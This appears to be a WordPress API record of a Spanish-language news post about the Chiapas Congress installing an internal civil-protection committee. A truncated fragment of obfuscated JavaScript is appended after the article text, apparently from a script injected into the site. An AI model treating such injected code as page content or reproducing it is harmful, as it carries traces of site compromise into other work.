{"id":2844,"date":"2022-06-10T22:44:01","date_gmt":"2022-06-10T22:44:01","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=2844"},"modified":"2022-06-10T22:44:02","modified_gmt":"2022-06-10T22:44:02","slug":"instalan-comite-interno-de-proteccion-civil-en-congreso","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=2844","title":{"rendered":"Instalan comit\u00e9 interno de Protecci\u00f3n Civil en Congreso"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"582\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/06\/IMG-20220609-WA0059-1024x582.jpg\" alt=\"\" class=\"wp-image-2845\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/06\/IMG-20220609-WA0059-1024x582.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/06\/IMG-20220609-WA0059-300x171.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/06\/IMG-20220609-WA0059-768x437.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/06\/IMG-20220609-WA0059.jpg 1280w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>\u2022 El Poder Legislativo entreg\u00f3 reconocimientos al secretario de Protecci\u00f3n Civil, as\u00ed como a los jefes de brigadas y brigadistas.<\/p>\n\n\n\n<p>Tuxtla Guti\u00e9rrez, 9 de junio de 2022.- En acto protocolario, el diputado Jos\u00e9 Antonio Aguilar Meza y el secretario de Protecci\u00f3n Civil del Gobierno del Estado, Luis Manuel Garc\u00eda Moreno, instalaron el Comit\u00e9 Interno de Protecci\u00f3n Civil del Congreso de Chiapas, la cual est\u00e1 integrada por: legisladores, titulares y trabajadores de las diversas \u00e1reas del Poder Legislativo.Cabe destacar que el objetivo de dicha unidad es la prevenci\u00f3n en casos de contingencia y la seguridad de quienes laboran y de quienes visitan el edificio parlamentario. El Comit\u00e9, representan -en suma-, una instancia de apoyo.La coordinaci\u00f3n de estrategias ante cualquier contingencia, pueden salvar vidas, lo que, sumado a la capacitaci\u00f3n y prevenci\u00f3n, mitigan el impacto negativo ante casos de desastre, sostuvo el diputado Jos\u00e9 Antonio Aguilar Meza presidente de la Comisi\u00f3n de Protecci\u00f3n Civil en el Congreso del Estado.El presidente de la Comisi\u00f3n de Protecci\u00f3n Civil, Jos\u00e9 Antonio Aguilar Meza, reconoci\u00f3 esta fusi\u00f3n para trabajar en el bienestar de los asistentes al Congreso de Chiapas, tambi\u00e9n aplaudi\u00f3 el hecho que este Comit\u00e9 del legislativo, es uno de los mejor preparados y con mayores resultados.Cerr\u00f3 diciendo que es de suma importancia la creaci\u00f3n de estas unidades de Protecci\u00f3n Civil, am\u00e9n de que se trata de un compromiso del gobernador Rutilio Escand\u00f3n Cadenas, quien instruy\u00f3 se cumpla en los tres poderes de gobierno la creaci\u00f3n de estas, ya que es una prioridad el reducir riesgos y protecci\u00f3n a la sociedad.Al tomar protesta de los integrantes de este comit\u00e9, Luis Manuel Garc\u00eda Moreno secretario de Protecci\u00f3n Civil, junto a los presidentes de la Mesa Directiva, Mar\u00eda de los \u00c1ngeles Trejo Huerta y de la Junta de Coordinaci\u00f3n Pol\u00edtica, Yamil Melgar, as\u00ed como de los legisladores de la Comisi\u00f3n, se\u00f1al\u00f3 que seguir\u00e1n trabajando de manera coordinada con todos los sectores a fin de eficientar la prevenci\u00f3n y mitigaci\u00f3n de riesgos, contribuyendo a proteger la integridad f\u00edsica y el patrimonio de las y los chiapanecos.La presidenta de la Mesa Directiva, Mar\u00eda de los \u00c1ngeles Trejo coment\u00f3 que es por dem\u00e1s importante el conformar el comit\u00e9 interno, quienes tienen la encomienda de asegurar con acciones integrales, la responsabilidad de responder ante cualquier contingencia para salvaguardar la integridad f\u00edsica de todos los presentes.Al encuentro, asistieron los diputados, Rub\u00e9n Zuarth Esquinca, Jorge Luis Villatoro Osorio, Mario Humberto V\u00e1zquez L\u00f3pez, Manuel Pulido L\u00f3pez, Sonia Catalina \u00c1lvarez, Leticia Albores Ru\u00edz, Leticia M\u00e9ndez, Cecilia L\u00f3pez S\u00e1nchez, Flor de Mar\u00eda Esponda Torres.As\u00ed mismo, se hizo entrega de reconocimientos a los jefes de brigadas y brigadistas, y el Congreso de Chiapas entreg\u00f3 un reconocimiento a la Secretar\u00eda de Protecci\u00f3n Civil del Estado, por su trabajo a favor de los m\u00e1s de 300 trabajadores que laboran y la poblaci\u00f3n flotante.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>\u2022 El Poder Legislativo entreg\u00f3 reconocimientos al secretario de Protecci\u00f3n Civil, as\u00ed como a los jefes de brigadas y brigadistas. Tuxtla Guti\u00e9rrez, 9 de junio de 2022.- En acto protocolario, el diputado Jos\u00e9 Antonio Aguilar Meza y el secretario de Protecci\u00f3n Civil del Gobierno del Estado, Luis Manuel Garc\u00eda Moreno, instalaron el Comit\u00e9 Interno de &hellip;<\/p>\n","protected":false},"author":2,"featured_media":2845,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[6],"tags":[],"class_list":["post-2844","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-tuxtla"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/2844","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=2844"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/2844\/revisions"}],"predecessor-version":[{"id":2846,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/2844\/revisions\/2846"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/2845"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=2844"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=2844"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=2844"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}